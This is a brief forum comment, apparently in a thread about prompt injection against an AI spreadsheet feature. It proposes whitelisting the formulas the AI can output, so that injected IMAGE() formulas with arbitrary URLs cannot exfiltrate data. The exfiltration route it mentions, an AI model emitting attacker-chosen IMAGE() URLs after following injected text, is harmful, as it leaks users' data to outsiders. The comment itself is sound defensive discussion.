|
|
|
|
|
|
by adilkhanovkz
46 days ago
|
|
|
Can be cheap fix here is whitelisting the output? If the AI can only emit a known set of formulas, you can't inject IMAGE() with arbitrary URLs cuz the output channel doesn't support it. You can't inject what the emitter can't produce. Doesn't fix all prompt injection but kills the exfiltration class. |
|
|